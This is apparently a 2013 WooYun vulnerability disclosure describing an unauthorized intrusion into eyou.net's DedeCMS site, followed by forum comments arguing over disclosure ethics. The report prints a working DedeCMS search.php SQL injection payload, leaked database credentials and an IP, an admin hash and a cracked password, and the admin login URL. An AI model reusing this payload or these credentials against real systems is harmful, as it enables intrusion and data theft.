漏洞概要
关注数(24)
关注此漏洞
漏洞标题:亿中邮(亿邮)信息技术官方网站沦陷,已成功进入后台
漏洞作者: 钱途
提交时间:2013-04-14 23:00
修复时间:2013-05-29 23:01
公开时间:2013-05-29 23:01
漏洞类型:成功的入侵事件
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2013-04-14: 细节已通知厂商并且等待厂商处理中
2013-04-16: 厂商已经确认,细节仅向厂商公开
2013-04-26: 细节向核心白帽子及相关领域专家公开
2013-05-06: 细节向普通白帽子公开
2013-05-16: 细节向实习白帽子公开
2013-05-29: 细节向公众公开
简要描述:
今天本身没事。为了不让他买叫我盲打王。 所以就打算随便找一个厂商 进行一次 脚本入侵。然后就找到了“亿中邮信息技术” 我大概说一下。没拿下webshell 后台设置了禁止写入。包括数据库备份 根本不可能。另外上传页面直接删除掉了。 但是你们网站的问题很大。 整个入侵过程一共是 20分钟。你们后台就沦陷了!·下面我大概讲一下入侵的整个思路
详细说明:
首先是网站主站有个意见反馈。然后我就很随意的 插入代码了。但是。返回的提交成功 一看就知道 dedecms页面。 然后我就知道。肯定是 失败的。 然后打开data/admin/ver.txt 发现版本很老啊。
然后测试打开http://www.eyou.net/data/mysql_error_trace.inc
的时候。我震惊了。这种是不可能出现的事情。 还是发生了。里面不光有后台地址。还有
5Bcfg_dbhost%5D=180.186.12.6&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=mysql&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=qq1314520&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=mysql&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB
mysql一般情况下是链接不上的。 所以就不做测试了。除非他开启了%号。但是这个基本不太可能。当知道了版本 还知道了后台就更简单了。dedecms最近很火。各种注入 各种爆。 然后就找到了一个代码如下
plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
然后就出现了
Error infos: Duplicate entry '1|admin|e41aa72de59c63006aad' for key 'group_key'
去出md5 前3后1 不用我多说。 CMD解密的密码是1111aaaa 还是aaaa1111具体哪个我忘记了。大概就是这个。然后登陆成功登陆后台。在拿webshell的时候。发现
配置文件'/data/www_eyou_net/data/config.cache.inc.php'不支持写入,无法修改系统配置参数! 而且上传页面也删除了。不管是备份也好。 还是提交任意文章也好。全部都是这样。于是。我认为还是算了。万一 点错了 删除掉那个文件就不好了。下面是图片
漏洞证明:
修复方案:
版权声明:转载请注明来源 钱途@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2013-04-16 10:10
厂商回复:
eyou.net目前并不涉及我们主要的业务数据,非常感谢反馈,我们正积极修补此问题。
最新状态:
暂无
漏洞评价:
评论
-
2013-04-14 23:03 |
鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:41 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)
你们来拷问我吧,我是知情者,我口风不紧的,很容易套出详情的。。。
-
2013-04-14 23:06 |
cnrstar ( 普通白帽子 | Rank:157 漏洞数:20 | Be my personal best!)
@鬼魅羊羔 哈哈,说出你知道,不然拖出去弹JJ弹5分钟
-
2013-04-14 23:17 |
lucky ( 普通白帽子 | Rank:409 漏洞数:81 | 三人行必有我师焉########################...)
-
2013-04-14 23:19 |
钱途 ( 普通白帽子 | Rank:273 漏洞数:44 )
@lucky 20分钟时保守估计 他这个站漏洞存在很严重。20分钟都算多的!·
-
2013-04-14 23:21 |
疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
@钱途 20分钟,这可是传说中的亿邮啊,怎么也得21分钟才好
-
2013-04-14 23:36 |
小胖子 ( 核心白帽子 | Rank:1727 漏洞数:125 | 如果大海能够带走我的矮丑...)
data/admin/ver.txt 20100928 DEDE5.6 ~~~~
-
2013-04-14 23:39 |
冷静 ( 路人 | Rank:3 漏洞数:2 )
-
2013-04-14 23:41 |
小胖子 ( 核心白帽子 | Rank:1727 漏洞数:125 | 如果大海能够带走我的矮丑...)
@冷静 http://www.eyou.net/admin8/login.php 后台在这里,1分钟就能结束的战斗,你要20分钟,楼主,你怎么看~
-
2013-04-14 23:59 |
YwiSax ( 实习白帽子 | Rank:62 漏洞数:4 | 淡定。)
-
2013-04-15 00:09 |
鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:41 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)
@小胖子 呵呵,不用显摆,钱途是从其他的地方开始看起,手工去找,最后才发现后台的,如果都像你一样,一上手就操起工具轮扫,碰见个有安全狗的,你这举动就显得很白痴了。
-
2013-04-15 00:09 |
鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:41 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)
-
2013-04-15 00:14 |
钱途 ( 普通白帽子 | Rank:273 漏洞数:44 )
@小胖子 你的留言我早就看到了,说真话,我承认漏洞很简单,我也说明了,你也没必要,在这里显示你多厉害,你见过二哥,一哥,跑别人下面显示自己的能力?,你这样公布别人漏洞是根本不负责任,如果这个站是你的。你心里什么感受,
-
2013-04-15 00:21 |
鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:41 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)
@钱途 匿了吧,他要是懂的话,就不会这样显摆了。。晚安,钱总~~游戏机玩腻了,就送了吧,虽然家里地方不够大,放个游戏机有点挤,但是,我忍了。。
-
2013-04-15 00:24 |
Blackeagle ( 实习白帽子 | Rank:62 漏洞数:10 | 向WooYun致敬)
-
2013-04-15 00:53 |
se55i0n ( 普通白帽子 | Rank:1567 漏洞数:172 )
@小胖子 @鬼魅羊羔 @钱途 你们这些大黑阔呀,没事就日站.........................................................................................................................话说带上我,行么?
-
2013-04-15 01:01 |
小胖子 ( 核心白帽子 | Rank:1727 漏洞数:125 | 如果大海能够带走我的矮丑...)
@se55i0n @钱途 @鬼魅羊羔 亲,我没扫,只是看到了网站指纹识别,没开任何工具扫~~然后顺手加了两个地址,顺手!~真的是顺手~莫激动~~~~~~~~
-
2013-04-15 01:02 |
小胖子 ( 核心白帽子 | Rank:1727 漏洞数:125 | 如果大海能够带走我的矮丑...)
-
2013-04-15 01:06 |
小胖子 ( 核心白帽子 | Rank:1727 漏洞数:125 | 如果大海能够带走我的矮丑...)
@钱途 @鬼魅羊羔 @Blackeagle @se55i0n @冷静 好嘛,我承认我错了嘛~深更半夜给各位大神跪下了嘛~~~~~~~~~~~羊羔跟前途肯定是好基友,漏洞细节都知道,就像我跟@z7y一样,再说了我又没说用户名和密码~
-
2013-04-15 01:22 |
淡漠天空 ( 实习白帽子 | Rank:1113 漏洞数:141 | M:出售GOV STATE NSA CIA NASA DHS Symant...)
-
2013-04-15 08:38 |
Rookie ( 普通白帽子 | Rank:288 漏洞数:78 | 123)
@鬼魅羊羔 既然你家里地方太小. 不如直接快递到我这里 我替你玩
-
2013-04-15 09:13 |
鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:41 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)
-
2013-04-15 09:36 |
围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)
-
2013-04-15 09:39 |
围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)
http://www.eyou.net/data/mysql_error_trace.inc 严重暴露目标~
-
2013-04-15 10:33 |
xsser ( 普通白帽子 | Rank:254 漏洞数:17 | 当我又回首一切,这个世界会好吗?)
-
2013-04-15 10:38 |
px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)
这个必须学习加关注,钱总已经从盲打向渗透进军了诶。。
-
2013-04-15 10:52 |
三十度 ( 路人 | Rank:0 漏洞数:1 | 本屌精通各种花式撸管,装逼32式炉火纯青。...)
-
2013-04-15 11:34 |
saline ( 普通白帽子 | Rank:231 漏洞数:29 | Focus On Web Secur1ty)
data/mysql_error_trace.inc路径泄漏,search拿到密码散列,加之破解。目测网速除开以外,全部过程不到1分钟
-
2013-04-15 11:58 |
三十度 ( 路人 | Rank:0 漏洞数:1 | 本屌精通各种花式撸管,装逼32式炉火纯青。...)
你们太坏了。把后台设置的那么死!!写不进东西。。。。你叫管理员情何以堪啊!!!
-
2013-04-15 12:59 |
坏虾 ( 路人 | Rank:28 漏洞数:5 | From Internet,For Internet……BY:坏虾)
!!! 你们这帮禽兽!! 爆CMS版本,又爆后台,还好意思说没爆账号密码?
-
2013-04-15 13:00 |
坏虾 ( 路人 | Rank:28 漏洞数:5 | From Internet,For Internet……BY:坏虾)
-
2013-04-15 13:13 |
iiiiiiiii ( 普通白帽子 | Rank:680 漏洞数:89 | )
你们到底想干啥啊 人家亿邮惹你们了? 先给人家爆后台 再给人家爆密码 好玩么 想让人家被娱乐圈挂首页么? 想让人家被脱裤么? @saline @小胖子@围剿
-
2013-04-15 13:15 |
zeracker ( 核心白帽子 | Rank:1068 漏洞数:134 | 多乌云、多机会!微信公众号: id:a301zls ...)
-
2013-04-15 13:26 |
小胖子 ( 核心白帽子 | Rank:1727 漏洞数:125 | 如果大海能够带走我的矮丑...)
我又看了下评论,我说两句,鬼魅羊羔同学说我,你自己看看你多遵守乌云规则,自己的洞官方没处理就自己对外公布了,漏洞地址你们自己翻,说到信息泄露,我的洞列表里面有一个洞,官方没确认,有人连密码都说出来了,乌云藏龙卧虎,有的东西,用不着说泄露,看个标题连中学生都懂,有的东西,也用不着说泄露,说了也不懂,不多做解释了。
-
2013-04-15 13:32 |
saline ( 普通白帽子 | Rank:231 漏洞数:29 | Focus On Web Secur1ty)
@iiiiiiiii 仅仅是提供思路~晕死了~好吧,不参与了,让大牛见笑了
-
2013-04-15 14:11 |
鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:41 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)
@小胖子 呵呵,提前泄露信息是我的错,我承认,但是……我说的好像不是泄露信息的事情吧?你几分钟拿下后台,是你的本事,没必要拿出来显摆吧?还故意at下,挑衅呗?我反正是做不出这事儿。。你自己衡量吧。
-
2013-04-15 14:12 |
鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:41 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)
-
2013-04-15 14:12 |
鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:41 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)
-
2013-04-15 14:20 |
鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:41 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)
@小胖子 你别给我拿那有的没的事情说事儿,那个泄露,是因为腾讯之前在QQ上说没影响,忽略了,所以我才公布的,公布了以后,让网媒转了下,腾讯才重视的,没看我后面的评论吗?用不用我给你晒晒我和应急响应中心的聊天截图?还有,人家钱途用了多久,你跟人家比什么?那你怎么不提交,别人提交了,你上来嘲讽下,合适吗?这事儿就到此为止,谁对谁错,自己掂量吧。
-
2013-04-15 15:06 |
松子 ( 实习白帽子 | Rank:45 漏洞数:5 | 无事)
-
2013-04-15 15:12 |
包子 ( 实习白帽子 | Rank:33 漏洞数:6 | 共同交流,共同进步)
呵呵,谁吃饱撑的,把一些php文件给删了。。。不懂法律么
-
2013-04-15 15:45 |
Drizzle.Risk ( 普通白帽子 | Rank:255 漏洞数:19 | You have an error in your SQL syntax; ch...)
真乱啊.....我竟然看完了.. 其实都没对错,说来说去,我个人的感觉是,漏洞修补前,不要公布出去比较好.. 无论加班修补漏洞,或对漏洞负责的还是程序员或测试人员,不是BOSS们.. 屌丝何必难为屌丝
-
2013-04-15 16:31 |
El4pse ( 路人 | Rank:29 漏洞数:7 | 世界上从来没有不可能这几个字,可不可能完...)
-
2013-04-16 11:57 |
blrk ( 实习白帽子 | Rank:66 漏洞数:6 | 粪豆褶)
-
2013-04-25 19:31 |
June ( 实习白帽子 | Rank:36 漏洞数:1 | 姐姐妳小时候给猪亲过啊?)
-
2013-05-02 10:09 |
乌云 ( 实习白帽子 | Rank:39 漏洞数:5 | 菜鸟一枚, </iframe>...)
-
2013-05-30 08:16 |
x1aoh4i ( 普通白帽子 | Rank:403 漏洞数:62 )
@鬼魅羊羔 @小胖子 @钱途 @se55i0n 8位QQ求收徒 资历不差 接触半年了 求收徒
-
2013-05-30 08:57 |
鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:41 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)
-
2013-05-30 09:00 |
x1aoh4i ( 普通白帽子 | Rank:403 漏洞数:62 )
@鬼魅羊羔 @钱途 鉴定完毕 好基友 有奸情 @se55i0n任务完成